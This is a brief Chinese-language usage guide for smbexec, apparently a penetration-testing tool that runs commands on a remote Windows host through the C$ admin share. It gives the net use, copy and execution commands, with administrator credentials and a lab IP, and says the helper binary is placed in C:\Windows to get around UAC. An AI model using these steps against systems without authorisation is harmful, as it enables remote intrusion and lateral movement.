目录
smbexec可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享。
smbexec
工具说明:
- test.exe:客户端主程序
- execserver.exe:目标系统中的辅助程序
使用:
将execserver.exe上次到目标系统的C:\Windows\目录下,以解除UAC对命令执行的限制,命令如下:
net use \\192.168.10.131\c$ /u:administrator x123456./@
copy execserver.exe \\192.168.10.131\c$\windows\
然后在客户端执行如下命令
test.exe 192.168.10.131 administrator x123456./@ whoami c$